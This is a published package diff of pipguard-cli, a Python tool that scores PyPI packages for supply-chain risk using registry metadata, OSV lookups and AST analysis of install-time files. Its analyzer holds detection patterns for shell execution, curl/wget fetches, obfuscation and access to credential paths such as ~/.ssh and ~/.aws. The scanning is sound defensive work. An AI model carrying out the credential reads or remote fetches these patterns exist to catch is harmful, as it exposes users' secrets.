pipguard-cli 0.1.0__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- pipguard_cli-0.1.0/.gitignore +9 -0
- pipguard_cli-0.1.0/PKG-INFO +8 -0
- pipguard_cli-0.1.0/pipguard/__init__.py +1 -0
- pipguard_cli-0.1.0/pipguard/analyzer.py +116 -0
- pipguard_cli-0.1.0/pipguard/cache.py +51 -0
- pipguard_cli-0.1.0/pipguard/display.py +90 -0
- pipguard_cli-0.1.0/pipguard/github.py +66 -0
- pipguard_cli-0.1.0/pipguard/main.py +322 -0
- pipguard_cli-0.1.0/pipguard/osv.py +19 -0
- pipguard_cli-0.1.0/pipguard/pypi.py +84 -0
- pipguard_cli-0.1.0/pipguard/scorer.py +84 -0
- pipguard_cli-0.1.0/plan.md +165 -0
- pipguard_cli-0.1.0/pyproject.toml +20 -0
|
@@ -0,0 +1 @@
|
|
|
1
|
+
__version__ = "0.1.0"
|
|
@@ -0,0 +1,116 @@
|
|
|
1
|
+
import ast
|
|
2
|
+
import io
|
|
3
|
+
import tarfile
|
|
4
|
+
from pathlib import Path
|
|
5
|
+
|
|
6
|
+
import httpx
|
|
7
|
+
|
|
8
|
+
# Files that execute automatically during install or first import
|
|
9
|
+
TARGET_FILES = {"setup.py", "pyproject.toml", "__init__.py"}
|
|
10
|
+
|
|
11
|
+
_NETWORK_PATTERNS = [
|
|
12
|
+
"requests.", "urllib.", "httpx.", "http.client",
|
|
13
|
+
"ftplib", "smtplib", "socket.",
|
|
14
|
+
]
|
|
15
|
+
_SHELL_PATTERNS = ["os.system", "subprocess.", "commands.getoutput"]
|
|
16
|
+
_HOME_STRINGS = ["~/.ssh", "~/.aws", "~/.config", "~/.gnupg", "~/.netrc"]
|
|
17
|
+
|
|
18
|
+
|
|
19
|
+
class _FlagVisitor(ast.NodeVisitor):
|
|
20
|
+
def __init__(self):
|
|
21
|
+
self.flags: dict[str, bool] = {
|
|
22
|
+
"network_call": False,
|
|
23
|
+
"env_access": False,
|
|
24
|
+
"home_dir_access": False,
|
|
25
|
+
"shell_exec": False,
|
|
26
|
+
"base64_obfuscation": False,
|
|
27
|
+
"dynamic_exec": False,
|
|
28
|
+
}
|
|
29
|
+
|
|
30
|
+
def visit_Call(self, node: ast.Call):
|
|
31
|
+
func_str = ast.unparse(node)
|
|
32
|
+
|
|
33
|
+
if any(p in func_str for p in _NETWORK_PATTERNS):
|
|
34
|
+
self.flags["network_call"] = True
|
|
35
|
+
|
|
36
|
+
# curl/wget buried in string args
|
|
37
|
+
for child in ast.walk(node):
|
|
38
|
+
if isinstance(child, ast.Constant) and isinstance(child.value, str):
|
|
39
|
+
if any(s in child.value for s in ("curl ", "wget ", "http://", "https://")):
|
|
40
|
+
self.flags["network_call"] = True
|
|
41
|
+
|
|
42
|
+
if "os.environ" in func_str or "os.getenv" in func_str:
|
|
43
|
+
self.flags["env_access"] = True
|
|
44
|
+
|
|
45
|
+
if any(p in func_str for p in _SHELL_PATTERNS):
|
|
46
|
+
self.flags["shell_exec"] = True
|
|
47
|
+
|
|
48
|
+
if func_str.startswith("eval(") or func_str.startswith("exec("):
|
|
49
|
+
self.flags["dynamic_exec"] = True
|
|
50
|
+
self.flags["shell_exec"] = True
|
|
51
|
+
|
|
52
|
+
if "base64.b64decode" in func_str or "base64.decodebytes" in func_str:
|
|
53
|
+
self.flags["base64_obfuscation"] = True
|
|
54
|
+
|
|
55
|
+
# getattr-based obfuscation: getattr(os, 'sys'+'tem')(...)
|
|
56
|
+
if (
|
|
57
|
+
isinstance(node.func, ast.Call)
|
|
58
|
+
and isinstance(node.func.func, ast.Name)
|
|
59
|
+
and node.func.func.id == "getattr"
|
|
60
|
+
):
|
|
61
|
+
self.flags["dynamic_exec"] = True
|
|
62
|
+
|
|
63
|
+
self.generic_visit(node)
|
|
64
|
+
|
|
65
|
+
def visit_Attribute(self, node: ast.Attribute):
|
|
66
|
+
full = ast.unparse(node)
|
|
67
|
+
if "expanduser" in full or ".home()" in full:
|
|
68
|
+
self.flags["home_dir_access"] = True
|
|
69
|
+
self.generic_visit(node)
|
|
70
|
+
|
|
71
|
+
def visit_Constant(self, node: ast.Constant):
|
|
72
|
+
if isinstance(node.value, str):
|
|
73
|
+
if any(node.value.startswith(p) for p in _HOME_STRINGS):
|
|
74
|
+
self.flags["home_dir_access"] = True
|
|
75
|
+
self.generic_visit(node)
|
|
76
|
+
|
|
77
|
+
|
|
78
|
+
def _analyze_source(source: str) -> dict[str, bool]:
|
|
79
|
+
try:
|
|
80
|
+
tree = ast.parse(source)
|
|
81
|
+
except SyntaxError:
|
|
82
|
+
return {}
|
|
83
|
+
visitor = _FlagVisitor()
|
|
84
|
+
visitor.visit(tree)
|
|
85
|
+
return visitor.flags
|
|
86
|
+
|
|
87
|
+
|
|
88
|
+
async def analyze_tarball(tarball_url: str) -> dict[str, bool]:
    """Download source tarball and run AST analysis on install-time files."""
    async with httpx.AsyncClient(timeout=30, follow_redirects=True) as client:
        response = await client.get(tarball_url)
        response.raise_for_status()

    # Union of flags across every analyzed member; starts all-False.
    combined: dict[str, bool] = dict.fromkeys(
        (
            "network_call",
            "env_access",
            "home_dir_access",
            "shell_exec",
            "base64_obfuscation",
            "dynamic_exec",
        ),
        False,
    )

    archive = io.BytesIO(response.content)
    with tarfile.open(fileobj=archive, mode="r:gz") as tar:
        for member in tar.getmembers():
            # Only files that run at install time / first import matter.
            if Path(member.name).name not in TARGET_FILES:
                continue
            handle = tar.extractfile(member)
            if handle is None:  # directories, links, etc.
                continue
            text = handle.read().decode("utf-8", errors="ignore")
            # OR each file's flags into the running union.
            for key, hit in _analyze_source(text).items():
                combined[key] = combined[key] or hit

    return combined
|
|
@@ -0,0 +1,51 @@
|
|
|
1
|
+
import json
|
|
2
|
+
import sqlite3
|
|
3
|
+
import time
|
|
4
|
+
from pathlib import Path
|
|
5
|
+
|
|
6
|
+
# On-disk cache: a single SQLite database under the user's home directory.
CACHE_DIR = Path.home() / ".pipguard"
CACHE_DB = CACHE_DIR / "cache.db"

# Per-entry time-to-live, in seconds, by entry class.
TTL_TRUST = 86_400  # 24 hours
TTL_VULN = 21_600  # 6 hours
|
|
11
|
+
|
|
12
|
+
|
|
13
|
+
def _conn() -> sqlite3.Connection:
    """Open the cache database, creating the directory and schema on demand.

    Called on every cache operation; CREATE TABLE IF NOT EXISTS makes the
    repeated schema statement a cheap no-op after the first run.
    """
    CACHE_DIR.mkdir(exist_ok=True)
    connection = sqlite3.connect(CACHE_DB)
    connection.execute(
        """
        CREATE TABLE IF NOT EXISTS cache (
            key TEXT PRIMARY KEY,
            value TEXT NOT NULL,
            expires_at REAL NOT NULL
        )
        """
    )
    connection.commit()
    return connection
|
|
25
|
+
|
|
26
|
+
|
|
27
|
+
def get(key: str) -> dict | None:
    """Return the cached dict stored under *key*, or None if missing/expired."""
    con = _conn()
    try:
        row = con.execute(
            "SELECT value, expires_at FROM cache WHERE key = ?", (key,)
        ).fetchone()
        if row is None:
            return None
        value, expires_at = row
        if time.time() > expires_at:
            # Purge the stale row so the cache file doesn't grow without bound.
            with con:  # transaction scope: commits the delete
                con.execute("DELETE FROM cache WHERE key = ?", (key,))
            return None
        return json.loads(value)
    finally:
        # sqlite3's `with con:` only manages the transaction — it never closes
        # the connection, which leaked one open handle per call before.
        con.close()
|
|
38
|
+
|
|
39
|
+
|
|
40
|
+
def set(key: str, value: dict, ttl: int) -> None:
    """Store *value* (JSON-serializable) under *key*, expiring *ttl* seconds from now.

    NOTE: intentionally shadows the builtin ``set`` — callers use it as
    ``cache.set(...)``, so the name is part of the module's public API.
    """
    con = _conn()
    try:
        with con:  # transaction scope: commits the upsert
            con.execute(
                "INSERT OR REPLACE INTO cache (key, value, expires_at) VALUES (?, ?, ?)",
                (key, json.dumps(value), time.time() + ttl),
            )
    finally:
        # Close explicitly: `with con:` only commits/rolls back and previously
        # leaked one open sqlite3 connection per call.
        con.close()
|
|
46
|
+
|
|
47
|
+
|
|
48
|
+
def clear_vuln() -> None:
    """Wipe all CVE/vulnerability cache entries (for pipguard update --force)."""
    con = _conn()
    try:
        with con:  # transaction scope: commits the delete
            con.execute("DELETE FROM cache WHERE key LIKE 'osv:%'")
    finally:
        # Close explicitly: `with con:` never closes the connection,
        # which previously leaked a handle on every call.
        con.close()
|
|
@@ -0,0 +1,90 @@
|
|
|
1
|
+
from rich.console import Console
|
|
2
|
+
from rich.table import Table
|
|
3
|
+
|
|
4
|
+
# Shared Rich console — imported by other modules so all output is uniform.
console = Console()

# Verdict → Rich color name / human-readable label for the report footer.
_VERDICT_COLOR = {"LOW": "green", "MEDIUM": "yellow", "HIGH": "red"}
_VERDICT_LABEL = {"LOW": "LOW RISK", "MEDIUM": "MEDIUM RISK", "HIGH": "HIGH RISK"}
|
|
8
|
+
|
|
9
|
+
|
|
10
|
+
def show_report(
    package: str,
    metadata: dict,
    download_stats: dict,
    vulns: list[dict],
    analysis_flags: dict,
    breakdown: dict,
    cached: bool = False,
) -> None:
    """Render the full risk report: trust score, code analysis, and verdict."""
    suffix = " [dim](cached)[/dim]" if cached else ""
    console.print(f"\nAnalyzing [bold]{package}[/bold]{suffix}...\n")

    # ── Trust score ──────────────────────────────────────────────
    console.rule("[bold]TRUST SCORE[/bold]")
    trust = Table(box=None, show_header=False, padding=(0, 2))
    trust.add_column(width=28)
    trust.add_column()

    age = metadata.get("age_days")
    if age is None:
        age_str, age_icon = "unknown", "❓"
    else:
        age_str = f"{age}d"
        # <30d is the danger window; <90d is still warning territory.
        age_icon = "🔴" if age < 30 else ("⚠️" if age < 90 else "✅")
    trust.add_row("Package age:", f"{age_str} {age_icon}")

    trust.add_row(
        "GitHub repo:",
        "✅ linked" if metadata.get("github_url") else "🔴 none",
    )

    spike = download_stats.get("spike_pct")
    monthly = download_stats.get("last_month") or 0
    # Large spikes on low-volume packages are the suspicious combination.
    if spike and spike > 300 and monthly < 50_000:
        trust.add_row("Download spike:", f"+{spike:.0f}% ⚠️")
    else:
        trust.add_row("Download spike:", "normal ✅")

    if vulns:
        trust.add_row("Known vulns:", f"🔴 {len(vulns)} found ({vulns[0]['id']})")
    else:
        trust.add_row("Known vulns:", "✅ none")

    console.print(trust)

    # ── Code analysis ────────────────────────────────────────────
    console.rule("[bold]CODE ANALYSIS[/bold]")

    if not analysis_flags:
        console.print(" [dim]No source tarball available — code analysis skipped[/dim]")
    else:
        analysis = Table(box=None, show_header=False, padding=(0, 2))
        analysis.add_column(width=28)
        analysis.add_column()

        def add_flag(label: str, key: str):
            # One row per heuristic flag from the AST analyzer.
            hit = analysis_flags.get(key, False)
            analysis.add_row(label, "🔴 FOUND" if hit else "✅ NOT FOUND")

        add_flag("Network requests:", "network_call")
        add_flag("Env var access:", "env_access")
        add_flag("Shell execution:", "shell_exec")
        add_flag("Base64 obfuscation:", "base64_obfuscation")
        add_flag("Home dir access:", "home_dir_access")
        console.print(analysis)

    # ── Verdict ──────────────────────────────────────────────────
    verdict = breakdown["verdict"]
    score = breakdown["score"]
    color = _VERDICT_COLOR[verdict]
    console.rule()
    console.print(
        f" VERDICT: [{color}]{_VERDICT_LABEL[verdict]}[/{color}]"
        f" (Score: [bold]{score}[/bold])"
    )
    console.rule()
    console.print()
|
|
@@ -0,0 +1,66 @@
|
|
|
1
|
+
import re
|
|
2
|
+
|
|
3
|
+
import httpx
|
|
4
|
+
|
|
5
|
+
# Classifiers that indicate a package has no business making network calls at install time
PURE_PYTHON_CLASSIFIERS = {
    "Programming Language :: Python :: Implementation :: CPython",
    "Topic :: Utilities",
    "Topic :: Text Processing",
    "Topic :: Software Development :: Libraries :: Python Modules",
}

# Classifiers where network calls are plausible
NETWORK_CLASSIFIERS = {
    "Topic :: Internet :: WWW/HTTP",
    "Topic :: System :: Networking",
    "Topic :: Scientific/Engineering :: Artificial Intelligence",
    "Topic :: Software Development :: Build Tools",
}

_NETWORK_KEYWORDS = [
    "download", "binary", "binaries", "pre-built", "native extension",
    "model weights", "fetches", "auto-update", "update check",
]
_PURE_KEYWORDS = ["pure python", "pure-python", "zero dependencies", "no network", "offline"]


def classify_from_classifiers(classifiers: list[str]) -> str:
    """
    Returns 'pure_python', 'network_expected', or 'ambiguous' based on PyPI classifiers.
    This is free — classifiers are already in the PyPI JSON response.
    """
    tags = set(classifiers)
    # A network-ish classifier always wins: it overrides any pure-Python tag.
    if tags & NETWORK_CLASSIFIERS:
        return "network_expected"
    if tags & PURE_PYTHON_CLASSIFIERS:
        return "pure_python"
    return "ambiguous"
|
|
42
|
+
|
|
43
|
+
|
|
44
|
+
async def fetch_readme_classification(github_url: str) -> str:
    """Classify a package from its GitHub README keywords.

    Only called when classifiers are ambiguous or network_expected.
    Returns 'network_expected', 'pure_python', or 'unknown'.
    """
    match = re.match(r"https://github\.com/([^/]+/[^/\s]+)", github_url)
    if not match:
        return "unknown"

    # PyPI project URLs frequently end in ".git" (clone URLs);
    # raw.githubusercontent.com only knows the bare repo name, so the
    # suffix must be stripped or the README fetch 404s.
    repo = match.group(1).rstrip("/").removesuffix(".git")
    readme_url = f"https://raw.githubusercontent.com/{repo}/HEAD/README.md"

    async with httpx.AsyncClient(timeout=10) as client:
        r = await client.get(readme_url)
        if r.status_code != 200:
            return "unknown"
        text = r.text.lower()

    # Network keywords take precedence over pure-Python keywords.
    if any(kw in text for kw in _NETWORK_KEYWORDS):
        return "network_expected"
    if any(kw in text for kw in _PURE_KEYWORDS):
        return "pure_python"
    return "unknown"
|
|
@@ -0,0 +1,322 @@
|
|
|
1
|
+
import asyncio
|
|
2
|
+
import subprocess
|
|
3
|
+
import sys
|
|
4
|
+
from pathlib import Path
|
|
5
|
+
from typing import Optional
|
|
6
|
+
|
|
7
|
+
import typer
|
|
8
|
+
from rich.prompt import Confirm
|
|
9
|
+
|
|
10
|
+
from pipguard import analyzer, cache, display, github, osv, pypi, scorer
|
|
11
|
+
from pipguard.display import console
|
|
12
|
+
|
|
13
|
+
app = typer.Typer(
|
|
14
|
+
help="pipguard — supply chain attack prevention for pip installs.",
|
|
15
|
+
add_completion=False,
|
|
16
|
+
)
|
|
17
|
+
|
|
18
|
+
|
|
19
|
+
async def _analyze(package: str, version: str | None, no_cache: bool) -> tuple[dict, bool]:
    """Core analysis pipeline. Returns (result_dict, was_cached)."""
    cache_key = f"full:{package}:{version or 'latest'}"

    if not no_cache and (hit := cache.get(cache_key)):
        return hit, True

    # Fetch metadata first to resolve the exact version, then query OSV with it
    metadata = await pypi.fetch_metadata(package, version)
    download_stats, vulns = await asyncio.gather(
        pypi.fetch_download_stats(package),
        osv.check_vulns(package, metadata["version"]),
    )

    # Classifier gating: decide whether to call GitHub README
    classifier_context = github.classify_from_classifiers(metadata["classifiers"])
    readme_context = "unknown"
    if metadata.get("github_url") and classifier_context in ("ambiguous", "network_expected"):
        readme_context = await github.fetch_readme_classification(metadata["github_url"])

    # Layer 2: AST analysis — only if source tarball exists
    tarball = metadata.get("tarball_url")
    analysis_flags: dict = await analyzer.analyze_tarball(tarball) if tarball else {}

    breakdown = scorer.compute(
        metadata, download_stats, vulns, analysis_flags, classifier_context, readme_context
    )

    result = {
        "metadata": metadata,
        "download_stats": download_stats,
        "vulns": vulns,
        "analysis_flags": analysis_flags,
        "breakdown": breakdown,
    }

    # Always refresh the cache entry, even on --no-cache runs (which only
    # bypass the read above).
    cache.set(cache_key, result, cache.TTL_TRUST)
    return result, False
|
|
61
|
+
|
|
62
|
+
|
|
63
|
+
@app.command()
def install(
    package: str = typer.Argument(..., help="Package to analyze and install"),
    version: Optional[str] = typer.Option(None, "--version", "-v", help="Specific version"),
    no_cache: bool = typer.Option(False, "--no-cache", help="Bypass cache for this run"),
    yes: bool = typer.Option(False, "--yes", "-y", help="Skip confirmation prompt"),
):
    """Analyze a package for supply chain risks, then install it."""
    try:
        result, cached = asyncio.run(_analyze(package, version, no_cache))
    except Exception as e:
        console.print(f"[red]Analysis failed: {e}[/red]")
        raise typer.Exit(1)

    display.show_report(
        package,
        result["metadata"],
        result["download_stats"],
        result["vulns"],
        result["analysis_flags"],
        result["breakdown"],
        cached=cached,
    )

    verdict = result["breakdown"]["verdict"]

    # HIGH risk defaults the prompt to "no", MEDIUM to "yes";
    # --yes skips both. LOW installs without asking.
    if not yes and verdict in ("HIGH", "MEDIUM"):
        if not Confirm.ask("Proceed anyway?", default=(verdict == "MEDIUM")):
            raise typer.Exit(1)

    # Pin to the exact version that was analyzed.
    pkg_spec = f"{package}=={result['metadata']['version']}"
    console.print(f"Installing [bold]{pkg_spec}[/bold]...")
    subprocess.run([sys.executable, "-m", "pip", "install", pkg_spec], check=True)
|
|
99
|
+
|
|
100
|
+
|
|
101
|
+
@app.command()
def info(
    package: str = typer.Argument(..., help="Package to inspect"),
    version: Optional[str] = typer.Option(None, "--version", "-v"),
    no_cache: bool = typer.Option(False, "--no-cache"),
):
    """Show a risk report without installing."""
    try:
        result, cached = asyncio.run(_analyze(package, version, no_cache))
    except Exception as e:
        console.print(f"[red]Analysis failed: {e}[/red]")
        raise typer.Exit(1)

    # Same report as `install`, minus the pip step.
    display.show_report(
        package,
        result["metadata"],
        result["download_stats"],
        result["vulns"],
        result["analysis_flags"],
        result["breakdown"],
        cached=cached,
    )
|
|
123
|
+
|
|
124
|
+
|
|
125
|
+
def _parse_requirement_line(line: str) -> "tuple[str, str | None] | None":
    """Parse one requirements.txt line into (name, pinned_version_or_None).

    Returns None for non-requirement lines: blanks, comments, and pip
    options such as ``-r other.txt`` / ``-e .``. Handles inline comments,
    environment markers (``; python_version < '3.9'``), extras
    (``pkg[security]``), and non-exact specifiers (``pkg>=1.0`` → unpinned).
    Exact ``pkg==1.0`` pins are preserved as before.
    """
    # Drop inline comments, then surrounding whitespace.
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("-"):
        return None
    # Drop environment markers.
    line = line.split(";", 1)[0].strip()

    if "==" in line:
        name, ver = line.split("==", 1)
        ver = ver.strip() or None
    else:
        # Cut at the first non-exact comparison operator; the exact
        # version is then unknown and resolved to latest downstream.
        for op in ("<=", ">=", "~=", "!=", "<", ">"):
            line = line.split(op, 1)[0]
        name, ver = line, None

    name = name.strip()
    # Remove extras: "pkg[security]" → "pkg".
    if "[" in name:
        name = name.split("[", 1)[0].strip()
    return (name, ver) if name else None


@app.command()
def scan(
    file: str = typer.Option("requirements.txt", "--file", "-f", help="Requirements file"),
    ci: bool = typer.Option(False, "--ci", help="Non-interactive CI mode"),
    fail_on: str = typer.Option("high", "--fail-on", help="Fail threshold: medium or high"),
    no_cache: bool = typer.Option(False, "--no-cache"),
):
    """Scan all packages in a requirements file."""
    req_path = Path(file)
    if not req_path.exists():
        console.print(f"[red]File not found: {file}[/red]")
        raise typer.Exit(1)

    packages: list[tuple[str, str | None]] = []
    for raw in req_path.read_text().splitlines():
        parsed = _parse_requirement_line(raw)
        if parsed:
            packages.append(parsed)

    # Score thresholds mirroring the verdict bands; unknown values fall
    # back to the "high" threshold.
    fail_score = {"medium": 31, "high": 61}.get(fail_on.lower(), 61)
    exit_code = 0

    for name, ver in packages:
        console.print(f"[dim]Scanning {name}...[/dim]")
        try:
            result, cached = asyncio.run(_analyze(name, ver, no_cache))
        except Exception as e:
            console.print(f"[yellow] Warning: could not scan {name}: {e}[/yellow]")
            continue

        bd = result["breakdown"]
        if bd["score"] >= fail_score:
            # Over threshold: show the full report; in CI mode that also
            # makes the whole scan fail.
            display.show_report(
                name,
                result["metadata"],
                result["download_stats"],
                result["vulns"],
                result["analysis_flags"],
                bd,
                cached=cached,
            )
            if ci:
                exit_code = 1
        else:
            verdict = bd["verdict"]
            color = {"LOW": "green", "MEDIUM": "yellow", "HIGH": "red"}[verdict]
            console.print(f" [{color}]{verdict}[/{color}] {name} (score: {bd['score']})")

    if ci and exit_code:
        raise typer.Exit(exit_code)
|
|
178
|
+
|
|
179
|
+
|
|
180
|
+
@app.command()
def history():
    """Show recent scan results from the local cache."""
    import json
    import sqlite3

    if not cache.CACHE_DB.exists():
        console.print("No scan history yet.")
        return

    # Read the full-analysis entries directly; "expires_at DESC" approximates
    # most-recently-scanned-first since TTLs are uniform.
    con = sqlite3.connect(cache.CACHE_DB)
    rows = con.execute(
        "SELECT key, value FROM cache WHERE key LIKE 'full:%' ORDER BY expires_at DESC LIMIT 20"
    ).fetchall()
    con.close()

    if not rows:
        console.print("No scan history yet.")
        return

    from rich.table import Table

    table = Table(title="Recent Scans", show_lines=False)
    table.add_column("Package")
    table.add_column("Version")
    table.add_column("Score", justify="right")
    table.add_column("Verdict")

    palette = {"LOW": "green", "MEDIUM": "yellow", "HIGH": "red"}
    for key, raw in rows:
        payload = json.loads(raw)
        breakdown = payload.get("breakdown", {})
        # Cache keys look like "full:<package>:<version>".
        _, pkg, ver = key.split(":", 2)
        verdict = breakdown.get("verdict", "?")
        score = breakdown.get("score", "?")
        color = palette.get(verdict, "white")
        table.add_row(pkg, ver, str(score), f"[{color}]{verdict}[/{color}]")

    console.print(table)
|
|
218
|
+
|
|
219
|
+
|
|
220
|
+
@app.command()
def update(
    force: bool = typer.Option(False, "--force", help="Wipe and refresh all CVE cache entries"),
):
    """Manage the pipguard cache."""
    if not force:
        # Without --force this command only explains how to use it.
        console.print("Use [bold]pipguard update --force[/bold] to refresh CVE cache immediately.")
        return
    cache.clear_vuln()
    console.print(
        "[green]CVE cache cleared.[/green] Fresh vulnerability data will be fetched on next scan."
    )
|
|
232
|
+
|
|
233
|
+
|
|
234
|
+
@app.command()
def configure():
    """Set up automatic pip interception for your shell.

    Appends a `pip` wrapper function to the detected shell's config file so
    that `pip install ...` is routed through `pipguard install`; all other
    pip subcommands fall through to the real pip binary.
    """
    import os
    import platform

    # Shell function templates. Each starts with MARKER (below) so a prior
    # install can be detected and the command stays idempotent.
    BASH_ZSH_FUNC = """
# pipguard — intercept pip install
pip() {
    if [ "$1" = "install" ]; then
        pipguard install "${@:2}"
    else
        command pip "$@"
    fi
}
"""

    FISH_FUNC = """
# pipguard — intercept pip install
function pip
    if test "$argv[1]" = "install"
        pipguard install $argv[2..]
    else
        command pip $argv
    end
end
"""

    POWERSHELL_FUNC = """
# pipguard — intercept pip install
function pip {
    if ($args[0] -eq "install") {
        pipguard install @($args | Select-Object -Skip 1)
    } else {
        & (Get-Command pip -CommandType Application | Select-Object -First 1).Source @args
    }
}
"""

    # Sentinel line shared by all three templates; its presence in a config
    # file means configure has already run there.
    MARKER = "# pipguard — intercept pip install"

    def already_configured(path: Path) -> bool:
        # True when the config file exists and already contains our marker.
        return path.exists() and MARKER in path.read_text()

    def append_to(path: Path, content: str):
        # Append (never overwrite) so existing user configuration survives.
        path.parent.mkdir(parents=True, exist_ok=True)
        with open(path, "a") as f:
            f.write(content)

    # Detect shell and config file
    if platform.system() == "Windows":
        # PowerShell
        # NOTE(review): this hardcodes the Windows PowerShell 5.x profile path;
        # PowerShell 7+ reads Documents/PowerShell instead. Resolving $PROFILE
        # from the running shell would cover both — confirm before relying on it.
        ps_profile = Path(os.environ.get("USERPROFILE", str(Path.home()))) / "Documents" / "WindowsPowerShell" / "Microsoft.PowerShell_profile.ps1"
        if already_configured(ps_profile):
            console.print("[yellow]pipguard is already configured in your PowerShell profile.[/yellow]")
            return
        append_to(ps_profile, POWERSHELL_FUNC)
        console.print(f"[green]Done![/green] Added pip interceptor to:\n  {ps_profile}")
        console.print("\nReload your shell or run:")
        console.print("  [bold]. $PROFILE[/bold]")

    else:
        # POSIX shells: choose the config file from $SHELL; bash is the fallback.
        shell = os.environ.get("SHELL", "")
        if "zsh" in shell:
            config = Path.home() / ".zshrc"
            func = BASH_ZSH_FUNC
        elif "fish" in shell:
            config = Path.home() / ".config" / "fish" / "config.fish"
            func = FISH_FUNC
        else:
            config = Path.home() / ".bashrc"
            func = BASH_ZSH_FUNC

        if already_configured(config):
            console.print(f"[yellow]pipguard is already configured in {config}[/yellow]")
            return

        append_to(config, func)
        console.print(f"[green]Done![/green] Added pip interceptor to:\n  {config}")
        console.print("\nReload your shell or run:")
        console.print(f"  [bold]source {config}[/bold]")

    console.print("\nFrom now on, [bold]pip install <package>[/bold] will automatically run through pipguard.")
    console.print("To remove, delete the pip() function from the config file shown above.")
|
|
319
|
+
|
|
320
|
+
|
|
321
|
+
# Allow running this module directly (e.g. `python -m pipguard.main`);
# the installed console script calls `app` via the entry point instead.
if __name__ == "__main__":
    app()
|
|
@@ -0,0 +1,19 @@
|
|
|
1
|
+
import httpx
|
|
2
|
+
|
|
3
|
+
OSV_URL = "https://api.osv.dev/v1/query"


async def check_vulns(package: str, version: str) -> list[dict]:
    """Query OSV for known vulnerabilities affecting package==version.

    Returns a list of {"id", "summary"} dicts; empty when OSV knows nothing.
    """
    query = {
        "version": version,
        "package": {"name": package, "ecosystem": "PyPI"},
    }
    async with httpx.AsyncClient(timeout=10) as client:
        response = await client.post(OSV_URL, json=query)
        response.raise_for_status()
        payload = response.json()

    return [
        {"id": vuln["id"], "summary": vuln.get("summary", "No description")}
        for vuln in payload.get("vulns", [])
    ]
|
|
@@ -0,0 +1,84 @@
|
|
|
1
|
+
from datetime import datetime, timezone
|
|
2
|
+
|
|
3
|
+
import httpx
|
|
4
|
+
|
|
5
|
+
PYPI_URL = "https://pypi.org/pypi/{package}/json"
PYPI_VERSION_URL = "https://pypi.org/pypi/{package}/{version}/json"
PYPISTATS_URL = "https://pypistats.org/api/packages/{package}/recent"


async def fetch_metadata(package: str, version: str | None = None) -> dict:
    """Fetch PyPI metadata and condense it into the fields pipguard scores on."""
    if version:
        url = PYPI_VERSION_URL.format(package=package, version=version)
    else:
        url = PYPI_URL.format(package=package)

    async with httpx.AsyncClient(timeout=10) as client:
        resp = await client.get(url)
        resp.raise_for_status()
        data = resp.json()

    info = data["info"]
    releases = data.get("releases", {})

    # Earliest release date across all versions
    upload_times = [
        datetime.fromisoformat(f["upload_time"]).replace(tzinfo=timezone.utc)
        for files in releases.values()
        for f in files
        if f.get("upload_time")
    ]
    first_release = min(upload_times) if upload_times else None
    age_days = (datetime.now(timezone.utc) - first_release).days if first_release else None

    # GitHub repo from project_urls or home_page
    project_urls = info.get("project_urls") or {}
    url_candidates = list(project_urls.values()) + [info.get("home_page") or ""]
    github_url = next((u for u in url_candidates if u and "github.com" in u), None)

    # Source tarball URL — version-specific endpoint puts files under data["urls"],
    # the non-version endpoint puts them under releases[version]
    target_version = version or info["version"]
    release_files = data.get("urls") or releases.get(target_version, [])
    tarball_url = next(
        (f["url"] for f in release_files if f.get("packagetype") == "sdist"), None
    )

    return {
        "name": info["name"],
        "version": target_version,
        "age_days": age_days,
        "classifiers": info.get("classifiers") or [],
        "github_url": github_url,
        "maintainer": info.get("maintainer") or info.get("author"),
        "tarball_url": tarball_url,
        "release_count": len(releases),
    }
|
|
60
|
+
|
|
61
|
+
|
|
62
|
+
async def fetch_download_stats(package: str) -> dict:
    """Fetch recent download counts from pypistats and derive a weekly spike %.

    Returns all-None values when the stats endpoint is unavailable for the
    package (e.g. brand-new or unlisted packages).
    """
    async with httpx.AsyncClient(timeout=10) as client:
        resp = await client.get(PYPISTATS_URL.format(package=package))

    if resp.status_code != 200:
        return {"last_week": None, "last_month": None, "spike_pct": None}

    stats = resp.json()["data"]
    weekly = stats.get("last_week") or 0
    monthly = stats.get("last_month") or 0

    # Expected weekly = monthly / 4; spike = how much this week exceeds that
    baseline = monthly / 4 if monthly else 0
    if baseline > 0:
        spike_pct = (weekly - baseline) / baseline * 100
    else:
        spike_pct = None

    return {
        "last_week": weekly,
        "last_month": monthly,
        "spike_pct": spike_pct,
    }
|
|
@@ -0,0 +1,84 @@
|
|
|
1
|
+
# Additive risk weights: compute() sums the weight of every triggered signal
# into the final score. (Verdict bands appear to be ~31/61 cutoffs based on
# scan's --fail-on map — confirm against compute()'s verdict logic.)
_WEIGHTS = {
    "known_cve": 50,
    "shell_exec": 40,
    "base64_obfuscation": 35,
    "package_new": 30,
    "home_dir_access": 30,
    "network_call_full": 25,  # pure Python package making network calls
    "network_call_discounted": 8,  # network calls expected for this package type
    "env_access": 20,
    "maintainer_new": 20,
    "download_spike": 15,
    "no_github": 10,
}
|
|
14
|
+
|
|
15
|
+
|
|
16
|
+
def compute(
|
|
17
|
+
metadata: dict,
|
|
18
|
+
download_stats: dict,
|
|
19
|
+
vulns: list[dict],
|
|
20
|
+
analysis_flags: dict,
|
|
21
|
+
classifier_context: str, # 'pure_python' | 'network_expected' | 'ambiguous'
|
|
22
|
+
readme_context: str, # 'network_expected' | 'pure_python' | 'unknown'
|
|
23
|
+
) -> dict:
|
|
24
|
+
score = 0
|
|
25
|
+
signals: dict[str, int] = {}
|
|
26
|
+
|
|
27
|
+
def add(label: str, pts: int):
|
|
28
|
+
nonlocal score
|
|
29
|
+
score += pts
|
|
30
|
+
signals[label] = pts
|
|
31
|
+
|
|
32
|
+
if vulns:
|
|
33
|
+
add(f"Known CVE ({vulns[0]['id']})", _WEIGHTS["known_cve"])
|
|
34
|
+
|
|
35
|
+
age_days = metadata.get("age_days")
|
|
36
|
+
if age_days is not None and age_days < 30:
|
|
37
|
+
add(f"Package < 30 days old ({age_days}d)", _WEIGHTS["package_new"])
|
|
38
|
+
|
|
39
|
+
spike_pct = download_stats.get("spike_pct")
|
|
40
|
+
last_month = download_stats.get("last_month") or 0
|
|
41
|
+
if spike_pct and spike_pct > 300 and last_month < 50_000:
|
|
42
|
+
add(f"Download spike +{spike_pct:.0f}%", _WEIGHTS["download_spike"])
|
|
43
|
+
|
|
44
|
+
if not metadata.get("github_url"):
|
|
45
|
+
add("No GitHub repo linked", _WEIGHTS["no_github"])
|
|
46
|
+
|
|
47
|
+
